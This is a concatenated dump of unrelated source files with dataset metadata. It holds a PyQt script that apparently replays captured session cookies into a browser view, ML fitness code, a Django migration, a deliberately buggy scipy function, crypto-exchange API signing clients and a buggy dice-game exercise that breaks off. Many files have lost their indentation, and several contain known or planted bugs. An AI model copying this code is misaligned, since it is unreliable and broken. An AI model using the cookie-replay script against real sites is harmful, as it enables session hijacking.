url: http://xxx.yyy.zzz/aaa/bbb?ccc/
host: xxx.yyy.zzz
domain: yyy.zzz
'''
cookies = []
# if no http protocol header, append it
if not url.startswith("http://"):
url = "http://" + url
match = self.urlPat.match(url)
host = match.group(1)
uri = match.group(2)
domain = ".".join(host.split(".")[-2:])
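        # naive registrable-domain guess: keep the last two host labels
        # (fine for example.com, wrong for co.uk-style suffixes)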
# adding cookies to cookiejar
for cookie in rawcookie.split(";"):
qnc = QNetworkCookie()
qnc.setDomain("."+domain)
key = cookie.split("=")[0]
value = "=".join(cookie.split("=")[1:])
qnc.setName(key)
qnc.setValue(value)
cookies.append(qnc)
self.open_web(url, cookies, useragent)
return
def open_web(self, url, cookies, useragent):
app = QApplication(sys.argv)
wind = QMainWindow()
view = MyBrowser()
nam = QNetworkAccessManager()
view.page().setNetworkAccessManager(nam)
print " [!] Spawning web view of " + url
ncj = QNetworkCookieJar()
ncj.setAllCookies(cookies)
nam.setCookieJar(ncj)
qnr = QNetworkRequest(QUrl(url))
qnr.setRawHeader("User-Agent", useragent)
view.load(qnr)
wind.setCentralWidget(view)
wind.show()
app.exec_()
if __name__ == "__main__":
browser = MonsterBrowser()
browser.parseArguments(sys.argv[1:])
| [
"[email protected]"
]
| |
098cf31e7e9c93028c892ae06068757816c156b8 | bc777bb292712419ffb683aeb07136c9ab68e11e | /src/common/calculate_accuracy.py | 07b9e0120d2cacadb77e65d4fc5078a482f0efc1 | []
| no_license | andrea-w/470project | b292f1c2e26e295fd3a7b3ce5cb0c4ec16d16d1c | 2460a293460fc53df6ea8ed133eca857a6fefe94 | refs/heads/master | 2023-07-23T20:41:54.281914 | 2019-08-02T09:53:56 | 2019-08-02T09:53:56 | 197,472,360 | 0 | 0 | null | 2023-07-06T21:39:30 | 2019-07-17T22:33:09 | Python | UTF-8 | Python | false | false | 2,676 | py | """
Creates new pandas DataFrame for each candidate, consisting of candidate's id and
the candidate's Mean Squared Error (MSE) in predicting test scores.
The fitness function consists of Mean Squared Error values in candidate's accuracy
in predicting scores. An additional column is inserted into the DataFrame with the
normalized MSE for each candidate, for use in determining probability and pairing for
reproduction.
"""
import pandas as pd
import math
import config
# creates a new dataframe to store the fitness function value for each candidate genotype
# compared to the actual test scores for the PK (state,year)
def calculate_accuracy(predicted_scores_df):
list_of_dfs = []
for c in range(1, config.NUM_CANDIDATES_PER_GENERATION + 1):
candidate_predictions = predicted_scores_df.loc[str(c),:]
candidate_dict = find_avg_mse_by_test(candidate_predictions)
s = pd.DataFrame.from_dict(data=candidate_dict)
list_of_dfs.append(s)
accuracy_df = pd.concat(list_of_dfs, axis=1)
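    # accuracy_df now holds one column per candidate; the index assigned below
    # labels the four rows, one per test type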
accuracy_df.index = ['AVG_MSE_MATH_4_SCORE', 'AVG_MSE_MATH_8_SCORE', 'AVG_MSE_READING_4_SCORE', 'AVG_MSE_READING_8_SCORE']
# the maximum possible MSE is equal to the square of the range of the test (500)
max_MSE = 500**2
# replace all 'NaN's in accuracy_df with max_MSE, since numerical values are needed later
# and 'NaN' value means that the candidate failed to predict any scores for the selected test type,
# which can be considered equivalent to the candidate achieving the maximum possible MSE
accuracy_df.fillna(max_MSE, inplace=True)
# append column to accuracy_df that is the sum of all columns for each row (summing over column axis)
sums = pd.DataFrame(data=accuracy_df.sum(axis=1),columns=['SUM-OF-ROW'])
accuracy_df = accuracy_df.assign(sum_of_row = sums)
# TODO delete writing to csv file - helpful for debugging
with open('accuracy.csv', 'w', newline='') as f:
accuracy_df.to_csv(f)
return accuracy_df
# calculates the MSE for a given candidate, grouped by test name
# returns a dict where key is the candidate_id, and value is the list of average MSEs
# @params: candidate_pred_df - a splice of the predicted_scores_df focused on one candidate
def find_avg_mse_by_test(candidate_pred_df):
test_names = ['AVG_MATH_4_SCORE', 'AVG_MATH_8_SCORE', 'AVG_READING_4_SCORE', 'AVG_READING_8_SCORE']
avg_mse = []
for t in test_names:
candidate_test_df = candidate_pred_df[candidate_pred_df['TEST-NAME'] == t]
avg_mse.append(candidate_test_df['MEAN-SQUARE-ERROR'].mean())
cand_dict = {str(candidate_pred_df.index[0]): avg_mse}
return cand_dict | [
"[email protected]"
]
| |
4dc5f5ab20f58f3e95d3b45ee001dd6316e8658c | 0641f003eb983c95fa8f4577e8894e69f107aa0e | /backend/apps/shop/migrations/0001_initial.py | e157aa70a4695cc81665981ece99b1d18c4cdb7a | []
| no_license | davidkwan95/bri2016-backend | d61929086d5a46849477a6b6c93c002c221340ad | f33b9e2b3b5526385949bcb5e987ad7933016de1 | refs/heads/master | 2020-05-29T08:40:41.982377 | 2016-10-01T00:12:46 | 2016-10-01T00:12:46 | 69,886,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,707 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-30 23:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(max_length=20)),
('total_price', models.IntegerField(null=True)),
('date_created', models.DateField()),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='OrderLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('unit_cost', models.IntegerField()),
('line_price', models.IntegerField()),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lines', to='shop.Order')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('code', models.CharField(max_length=20)),
('price', models.IntegerField()),
],
),
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='product',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Shop'),
),
migrations.AddField(
model_name='orderline',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Product'),
),
migrations.AddField(
model_name='order',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.Shop'),
),
]
| [
"[email protected]"
]
| |
a9fe63f7d3ec967b0984566e83707772eedadfb5 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/765188917950a2d371982a81fa142747ea65f14a-<binned_statistic_2d>-bug.py | 37399820742f3945f3f54302e29aeac36416da57 | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,928 | py | def binned_statistic_2d(x, y, values, statistic='mean', bins=10, range=None, expand_binnumbers=False):
"\n Compute a bidimensional binned statistic for one or more sets of data.\n\n This is a generalization of a histogram2d function. A histogram divides\n the space into bins, and returns the count of the number of points in\n each bin. This function allows the computation of the sum, mean, median,\n or other statistic of the values (or set of values) within each bin.\n\n Parameters\n ----------\n x : (N,) array_like\n A sequence of values to be binned along the first dimension.\n y : (N,) array_like\n A sequence of values to be binned along the second dimension.\n values : (N,) array_like or list of (N,) array_like\n The data on which the statistic will be computed. This must be\n the same shape as `x`, or a list of sequences - each with the same\n shape as `x`. If `values` is such a list, the statistic will be\n computed on each independently.\n statistic : string or callable, optional\n The statistic to compute (default is 'mean').\n The following statistics are available:\n\n * 'mean' : compute the mean of values for points within each bin.\n Empty bins will be represented by NaN.\n * 'std' : compute the standard deviation within each bin. This \n is implicitly calculated with ddof=0.\n * 'median' : compute the median of values for points within each\n bin. Empty bins will be represented by NaN.\n * 'count' : compute the count of points within each bin. This is\n identical to an unweighted histogram. `values` array is not\n referenced.\n * 'sum' : compute the sum of values for points within each bin.\n This is identical to a weighted histogram.\n * 'min' : compute the minimum of values for points within each bin.\n Empty bins will be represented by NaN.\n * 'max' : compute the maximum of values for point within each bin.\n Empty bins will be represented by NaN.\n * function : a user-defined function which takes a 1D array of\n values, and outputs a single numerical statistic. This function\n will be called on the values in each bin. Empty bins will be\n represented by function([]), or NaN if this returns an error.\n\n bins : int or [int, int] or array_like or [array, array], optional\n The bin specification:\n\n * the number of bins for the two dimensions (nx = ny = bins),\n * the number of bins in each dimension (nx, ny = bins),\n * the bin edges for the two dimensions (x_edge = y_edge = bins),\n * the bin edges in each dimension (x_edge, y_edge = bins).\n\n If the bin edges are specified, the number of bins will be,\n (nx = len(x_edge)-1, ny = len(y_edge)-1).\n\n range : (2,2) array_like, optional\n The leftmost and rightmost edges of the bins along each dimension\n (if not specified explicitly in the `bins` parameters):\n [[xmin, xmax], [ymin, ymax]]. All values outside of this range will be\n considered outliers and not tallied in the histogram.\n expand_binnumbers : bool, optional\n 'False' (default): the returned `binnumber` is a shape (N,) array of\n linearized bin indices.\n 'True': the returned `binnumber` is 'unraveled' into a shape (2,N)\n ndarray, where each row gives the bin numbers in the corresponding\n dimension.\n See the `binnumber` returned value, and the `Examples` section.\n\n .. 
versionadded:: 0.17.0\n\n Returns\n -------\n statistic : (nx, ny) ndarray\n The values of the selected statistic in each two-dimensional bin.\n x_edge : (nx + 1) ndarray\n The bin edges along the first dimension.\n y_edge : (ny + 1) ndarray\n The bin edges along the second dimension.\n binnumber : (N,) array of ints or (2,N) ndarray of ints\n This assigns to each element of `sample` an integer that represents the\n bin in which this observation falls. The representation depends on the\n `expand_binnumbers` argument. See `Notes` for details.\n\n\n See Also\n --------\n numpy.digitize, numpy.histogram2d, binned_statistic, binned_statistic_dd\n\n Notes\n -----\n Binedges:\n All but the last (righthand-most) bin is half-open. In other words, if\n `bins` is ``[1, 2, 3, 4]``, then the first bin is ``[1, 2)`` (including 1,\n but excluding 2) and the second ``[2, 3)``. The last bin, however, is\n ``[3, 4]``, which *includes* 4.\n\n `binnumber`:\n This returned argument assigns to each element of `sample` an integer that\n represents the bin in which it belongs. The representation depends on the\n `expand_binnumbers` argument. If 'False' (default): The returned\n `binnumber` is a shape (N,) array of linearized indices mapping each\n element of `sample` to its corresponding bin (using row-major ordering).\n If 'True': The returned `binnumber` is a shape (2,N) ndarray where\n each row indicates bin placements for each dimension respectively. In each\n dimension, a binnumber of `i` means the corresponding value is between\n (D_edge[i-1], D_edge[i]), where 'D' is either 'x' or 'y'.\n\n .. versionadded:: 0.11.0\n\n Examples\n --------\n >>> from scipy import stats\n\n Calculate the counts with explicit bin-edges:\n\n >>> x = [0.1, 0.1, 0.1, 0.6]\n >>> y = [2.1, 2.6, 2.1, 2.1]\n >>> binx = [0.0, 0.5, 1.0]\n >>> biny = [2.0, 2.5, 3.0]\n >>> ret = stats.binned_statistic_2d(x, y, None, 'count', bins=[binx,biny])\n >>> ret.statistic\n array([[ 2., 1.],\n [ 1., 0.]])\n\n The bin in which each sample is placed is given by the `binnumber`\n returned parameter. By default, these are the linearized bin indices:\n\n >>> ret.binnumber\n array([5, 6, 5, 9])\n\n The bin indices can also be expanded into separate entries for each\n dimension using the `expand_binnumbers` parameter:\n\n >>> ret = stats.binned_statistic_2d(x, y, None, 'count', bins=[binx,biny],\n ... expand_binnumbers=True)\n >>> ret.binnumber\n array([[1, 1, 1, 2],\n [1, 2, 1, 1]])\n\n Which shows that the first three elements belong in the xbin 1, and the\n fourth into xbin 2; and so on for y.\n\n "
try:
N = len(bins)
except TypeError:
N = 1
if ((N != 1) and (N != 2)):
xedges = yedges = np.asarray(bins, float)
bins = [xedges, yedges]
(medians, edges, binnumbers) = binned_statistic_dd([x, y], values, statistic, bins, range, expand_binnumbers=expand_binnumbers)
return BinnedStatistic2dResult(medians, edges[0], edges[1], binnumbers) | [
"[email protected]"
]
| |
5d8d85274d87f8f1d5474e429a79a01b31ce45a4 | 2e40c66b0fd702b55f94044cc4150bd0626fea57 | /dict.py | f05951365d5d6cd77d4ca818b9fdfec7717a5492 | []
| no_license | ramanuj760/PythonProject | 20b527f585b954819c0df75b303787e21d38deee | 3bd25757eaf29f5da46b1252ece5495aaae01670 | refs/heads/master | 2021-07-08T02:02:43.064020 | 2020-10-01T09:35:27 | 2020-10-01T09:35:27 | 191,696,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """write a python program to guess number between 1 to 9"""
print("welcome to guess number")
import random
a = random.randint(1, 9)
for i in range(9):
    b = int(input("enter a value: "))
    if b < a:
        print("your value is too small")
    elif b > a:
        print("your value is too large")
    else:
        break
print("value given by user", b)
if a == b:
    print("both the values are equal")
print("guessed number", a)
| [
"[email protected]"
]
| |
a42b36533d30b55a373753a69a88bc7ce88e7753 | c669f6041162d10f286cb2e04aa4163e6b37f951 | /l0qh4/repository/config_repository.py | a049fdea241ceb2ac175b74380e59f0575b7569a | []
| no_license | locnguyenvu/l0qh4 | 5096802263f4f5557d2576a2b3e00530b8743cc3 | fb1fc62dd12471c35f9d89b339fab4a52605f914 | refs/heads/master | 2023-01-09T16:50:55.418470 | 2020-11-07T04:22:56 | 2020-11-07T04:22:56 | 288,906,651 | 0 | 0 | null | 2020-11-07T04:22:57 | 2020-08-20T04:32:29 | Python | UTF-8 | Python | false | false | 164 | py | from .orm_model.config import Config
from ..shared.repository import Repository
class ConfigRepository(Repository):
ormclass = Config
domainclass = None
| [
"[email protected]"
]
| |
f47af696b45f0c254f382aef43afc297fd83e423 | 93ec296ce03189e48e52069ca8e5e35fd3765bbc | /build/lib/bitex/api/rest.py | f50a37da2ae6b0c2abeea6af1f34e02f46062e36 | [
"MIT"
]
| permissive | zhumzhu/bitex | b3be658fc97f313462efc9b1b21670c2622afa5c | 11d8f96ee7346fe5a3648d8b58377e41a956b67b | refs/heads/master | 2021-01-18T17:24:53.330001 | 2017-03-23T10:51:16 | 2017-03-23T10:51:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,370 | py | """
Contains all API Client sub-classes, which store exchange specific details
and feature the respective exchanges authentication method (sign()).
"""
# Import Built-ins
import logging
import json
import hashlib
import hmac
import base64
import time
import urllib
import urllib.parse
# Import Third-Party
from requests.auth import AuthBase
try:
import pyjwt as jwt
jwt = True
except ImportError:
jwt = False
# Import Homebrew
from bitex.api.REST.api import APIClient
log = logging.getLogger(__name__)
class BitfinexREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.bitfinex.com', timeout=5):
super(BitfinexREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
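        # Bitfinex v1 scheme: the JSON request body is base64-encoded into
        # X-BFX-PAYLOAD and signed with HMAC-SHA384 under the API secret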
try:
req = kwargs['params']
except KeyError:
req = {}
req['request'] = endpoint_path
req['nonce'] = self.nonce()
js = json.dumps(req)
data = base64.standard_b64encode(js.encode('utf8'))
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha384)
signature = h.hexdigest()
headers = {"X-BFX-APIKEY": self.key,
"X-BFX-SIGNATURE": signature,
"X-BFX-PAYLOAD": data}
return url, {'headers': headers}
class BitstampREST(APIClient):
def __init__(self, user_id='', key=None, secret=None, api_version=None,
url='https://www.bitstamp.net/api', timeout=5):
self.id = user_id
super(BitstampREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.id = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
message = nonce + self.id + self.key
signature = hmac.new(self.secret.encode(), message.encode(),
hashlib.sha256)
signature = signature.hexdigest().upper()
try:
req = kwargs['params']
except KeyError:
req = {}
req['key'] = self.key
req['nonce'] = nonce
req['signature'] = signature
return url, {'data': req}
class BittrexREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1.1',
url='https://bittrex.com/api', timeout=5):
super(BittrexREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
nonce = self.nonce()
req_string = endpoint_path + '?apikey=' + self.key + "&nonce=" + nonce + '&'
req_string += urllib.parse.urlencode(params)
headers = {"apisign": hmac.new(self.secret.encode('utf-8'),
(self.uri + req_string).encode('utf-8'),
hashlib.sha512).hexdigest()}
return self.uri + req_string, {'headers': headers, 'params': {}}
class CoincheckREST(APIClient):
def __init__(self, key=None, secret=None, api_version='api',
url='https://coincheck.com', timeout=5):
super(CoincheckREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params = json.dumps(params)
# sig = nonce + url + req
data = (nonce + endpoint_path + params).encode('utf-8')
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha256)
signature = h.hexdigest()
headers = {"ACCESS-KEY": self.key,
"ACCESS-NONCE": nonce,
"ACCESS-SIGNATURE": signature}
return url, {'headers': headers}
class GdaxAuth(AuthBase):
def __init__(self, api_key, secret_key, passphrase):
self.api_key = api_key.encode('utf-8')
self.secret_key = secret_key.encode('utf-8')
self.passphrase = passphrase.encode('utf-8')
def __call__(self, request):
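        # GDAX scheme: sign timestamp + method + path + body with HMAC-SHA256
        # keyed by the base64-decoded secret, and send the base64 digest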
timestamp = str(time.time())
message = (timestamp + request.method + request.path_url +
(request.body or ''))
hmac_key = base64.b64decode(self.secret_key)
signature = hmac.new(hmac_key, message.encode('utf-8'), hashlib.sha256)
signature_b64 = base64.b64encode(signature.digest())
request.headers.update({
'CB-ACCESS-SIGN': signature_b64,
'CB-ACCESS-TIMESTAMP': timestamp,
'CB-ACCESS-KEY': self.api_key,
'CB-ACCESS-PASSPHRASE': self.passphrase,
'Content-Type': 'application/json'
})
return request
class GDAXRest(APIClient):
def __init__(self, passphrase='', key=None, secret=None, api_version=None,
url='https://api.gdax.com', timeout=5):
self.passphrase = passphrase
super(GDAXRest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.passphrase = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
auth = GdaxAuth(self.key, self.secret, self.passphrase)
try:
js = kwargs['params']
except KeyError:
js = {}
return url, {'json': js, 'auth': auth}
class KrakenREST(APIClient):
def __init__(self, key=None, secret=None, api_version='0',
url='https://api.kraken.com', timeout=5):
super(KrakenREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
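        # Kraken scheme: HMAC-SHA512 over (URI path + SHA256(nonce + POST
        # data)), keyed with the base64-decoded API secret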
try:
req = kwargs['params']
except KeyError:
req = {}
req['nonce'] = self.nonce()
postdata = urllib.parse.urlencode(req)
# Unicode-objects must be encoded before hashing
encoded = (str(req['nonce']) + postdata).encode('utf-8')
message = (endpoint_path.encode('utf-8') +
hashlib.sha256(encoded).digest())
signature = hmac.new(base64.b64decode(self.secret),
message, hashlib.sha512)
sigdigest = base64.b64encode(signature.digest())
headers = {
'API-Key': self.key,
'API-Sign': sigdigest.decode('utf-8')
}
return url, {'data': req, 'headers': headers}
class ItbitREST(APIClient):
def __init__(self, user_id = '', key=None, secret=None, api_version='v1',
url='https://api.itbit.com', timeout=5):
self.userId = user_id
super(ItbitREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def load_key(self, path):
"""
Load user id, key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.userId = f.readline().strip()
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
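        # itBit scheme: SHA-256 the nonce-prefixed JSON array [verb, url, body,
        # nonce, timestamp], then HMAC-SHA512 over (url + hash) and send
        # "key:base64(signature)" in the Authorization header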
try:
params = kwargs['params']
except KeyError:
params = {}
verb = method_verb
if verb in ('PUT', 'POST'):
body = params
else:
body = {}
timestamp = self.nonce()
nonce = self.nonce()
message = json.dumps([verb, url, body, nonce, timestamp],
separators=(',', ':'))
sha256_hash = hashlib.sha256()
nonced_message = nonce + message
sha256_hash.update(nonced_message.encode('utf8'))
hash_digest = sha256_hash.digest()
hmac_digest = hmac.new(self.secret.encode('utf-8'),
url.encode('utf-8') + hash_digest,
hashlib.sha512).digest()
signature = base64.b64encode(hmac_digest)
auth_headers = {
'Authorization': self.key + ':' + signature.decode('utf8'),
'X-Auth-Timestamp': timestamp,
'X-Auth-Nonce': nonce,
'Content-Type': 'application/json'
}
return url, {'headers': auth_headers}
class OKCoinREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://www.okcoin.com/api', timeout=5):
super(OKCoinREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self,url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
# sig = nonce + url + req
data = (nonce + url).encode()
h = hmac.new(self.secret.encode('utf8'), data, hashlib.sha256)
signature = h.hexdigest()
headers = {"ACCESS-KEY": self.key,
"ACCESS-NONCE": nonce,
"ACCESS-SIGNATURE": signature}
return url, {'headers': headers}
class BTCERest(APIClient):
def __init__(self, key=None, secret=None, api_version='3',
url='https://btc-e.com/api', timeout=5):
super(BTCERest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, url, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
post_params = params
post_params.update({'nonce': nonce, 'method': endpoint.split('/', 1)[1]})
post_params = urllib.parse.urlencode(post_params)
signature = hmac.new(self.secret.encode('utf-8'),
post_params.encode('utf-8'), hashlib.sha512)
headers = {'Key': self.key, 'Sign': signature.hexdigest(),
"Content-type": "application/x-www-form-urlencoded"}
# split by tapi str to gain clean url;
url = url.split('/tapi', 1)[0] + '/tapi'
return url, {'headers': headers, 'params': params}
class CCEXRest(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://c-cex.com/t', timeout=5):
super(CCEXRest, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params['apikey'] = self.key
params['nonce'] = nonce
post_params = params
post_params.update({'nonce': nonce, 'method': endpoint})
post_params = urllib.parse.urlencode(post_params)
url = uri + post_params
        # hmac.new() takes the key first and returns an object, not a digest
        sig = hmac.new(self.secret.encode('utf-8'), url.encode('utf-8'),
                       hashlib.sha512).hexdigest()
        headers = {'apisign': sig}
return url, {'headers': headers}
class CryptopiaREST(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://www.cryptopia.co.nz/api', timeout=5):
super(CryptopiaREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
post_data = json.dumps(params)
        md5_hash = hashlib.md5()
        md5_hash.update(post_data.encode('utf-8'))
        md5 = base64.b64encode(md5_hash.digest()).decode('utf-8')
        sig = self.key + 'POST' + urllib.parse.quote_plus(uri).lower() + nonce + md5
        hmac_sig = base64.b64encode(hmac.new(base64.b64decode(self.secret),
                                             sig.encode('utf-8'),
                                             hashlib.sha256).digest()).decode('utf-8')
header_data = 'amx' + self.key + ':' + hmac_sig + ':' + nonce
headers = {'Authorization': header_data,
'Content-Type': 'application/json; charset=utf-8'}
return uri, {'headers': headers, 'data': post_data}
class GeminiREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.gemini.com', timeout=5):
super(GeminiREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
payload = params
payload['nonce'] = nonce
payload['request'] = endpoint_path
        payload = base64.b64encode(json.dumps(payload).encode('utf-8'))
        sig = hmac.new(self.secret.encode('utf-8'), payload,
                       hashlib.sha384).hexdigest()
headers = {'X-GEMINI-APIKEY': self.key,
'X-GEMINI-PAYLOAD': payload,
'X-GEMINI-SIGNATURE': sig}
return uri, {'headers': headers}
class YunbiREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v2',
url='https://yunbi.com/api', timeout=5):
super(YunbiREST, self).__init__(url, api_version=api_version, key=key,
secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
params['tonce'] = nonce
params['access_key'] = self.key
post_params = urllib.parse.urlencode(params)
msg = '%s|%s|%s' % (method_verb, endpoint_path, post_params)
        sig = hmac.new(self.secret.encode('utf-8'), msg.encode('utf-8'),
                       hashlib.sha256).hexdigest()
uri += post_params + '&signature=' + sig
return uri, {}
class RockTradingREST(APIClient):
def __init__(self, key=None, secret=None, api_version='v1',
url='https://api.therocktrading.com', timeout=5):
super(RockTradingREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
nonce = self.nonce()
try:
params = kwargs['params']
except KeyError:
params = {}
payload = params
payload['nonce'] = int(nonce)
payload['request'] = endpoint_path
msg = nonce + uri
sig = hmac.new(self.secret.encode(), msg.encode(), hashlib.sha384).hexdigest()
headers = {'X-TRT-APIKEY': self.key,
'X-TRT-Nonce': nonce,
'X-TRT-SIGNATURE': sig, 'Content-Type': 'application/json'}
return uri, {'headers': headers}
class PoloniexREST(APIClient):
def __init__(self, key=None, secret=None, api_version=None,
url='https://poloniex.com', timeout=5):
super(PoloniexREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
params['nonce'] = self.nonce()
payload = params
msg = urllib.parse.urlencode(payload).encode('utf-8')
sig = hmac.new(self.secret.encode('utf-8'), msg, hashlib.sha512).hexdigest()
headers = {'Key': self.key, 'Sign': sig}
return uri, {'headers': headers, 'data': params}
class QuoineREST(APIClient):
"""
The Quoine Api requires the API version to be designated in each requests's
header as {'X-Quoine-API-Version': 2}
"""
def __init__(self, key=None, secret=None, api_version=None,
url='https://api.quoine.com/', timeout=5):
if not jwt:
raise SystemError("No JWT Installed! Quoine API Unavailable!")
super(QuoineREST, self).__init__(url, api_version=api_version,
key=key, secret=secret, timeout=timeout)
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
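        # Quoine scheme: a JWT (HS256) over {path, nonce, token_id}, sent in
        # the X-Quoine-Auth header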
try:
params = kwargs['params']
except KeyError:
params = {}
path = endpoint_path + urllib.parse.urlencode(params)
msg = {'path': path, 'nonce': self.nonce(), 'token_id': self.key}
signature = jwt.encode(msg, self.secret, algorithm='HS256')
headers = {'X-Quoine-API-Version': '2', 'X-Quoine-Auth': signature,
'Content-Type': 'application/json'}
return self.uri+path, {'headers': headers}
class QuadrigaCXREST(APIClient):
def __init__(self, key=None, secret=None, client_id='', api_version='v2',
url='https://api.quoine.com/', timeout=5):
self.client_id = client_id
super(QuadrigaCXREST, self).__init__(url, api_version=api_version,
key=key, secret=secret,
timeout=timeout)
def load_key(self, path):
"""
Load key and secret from file.
"""
with open(path, 'r') as f:
self.key = f.readline().strip()
self.secret = f.readline().strip()
self.client_id = f.readline().strip()
def sign(self, uri, endpoint, endpoint_path, method_verb, *args, **kwargs):
try:
params = kwargs['params']
except KeyError:
params = {}
nonce = self.nonce()
msg = nonce + self.client_id + self.key
        signature = hmac.new(self.secret.encode(encoding='utf-8'),
                             msg.encode(encoding='utf-8'),
                             hashlib.sha256).hexdigest()
headers = {'key': self.key, 'signature': signature,
'nonce': nonce}
return self.uri, {'headers': headers, 'data': params} | [
"[email protected]"
]
| |
f3313107a5ffaa63d4869e3c442c991acd8d8d1c | 94eac0de3c2459edff4bc86a4a14dc73c8178a8e | /dag 2/Day 2 Exercise 2.2/buggy/dicegame/runner.py | 0d08a8dd7074327fff5aad2012400f8ab83cc50c | [
"MIT"
]
| permissive | U-Wik/my_repository | 650b57b7c734d055a383937f39abf17ca53cd282 | 6598e3b4878b1171827ea48729c2853c5c687fb0 | refs/heads/main | 2023-03-10T04:32:19.034363 | 2021-02-28T18:07:46 | 2021-02-28T18:07:46 | 339,459,117 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,149 | py | from .die import Die
from .utils import i_just_throw_an_exception
class GameRunner:
def __init__(self):
self.reset()
def reset(self):
self.round = 1
self.wins = 0
self.loses = 0
def answer(self):
total = 0
for die in self.dice:
total = total + die.value # not increment but added value
return total
@classmethod
def run(self): # not a bug as such but I change cls to self
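        # with @classmethod retained, "self" here is bound to the GameRunner
        # class itself, so self() below creates a fresh instance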
# don't like "probably" i remove it
runner = self() # moved it here, from inside the loop, should be done once
        guessCount = 0 # variable name changed from c to guessCount
while True:
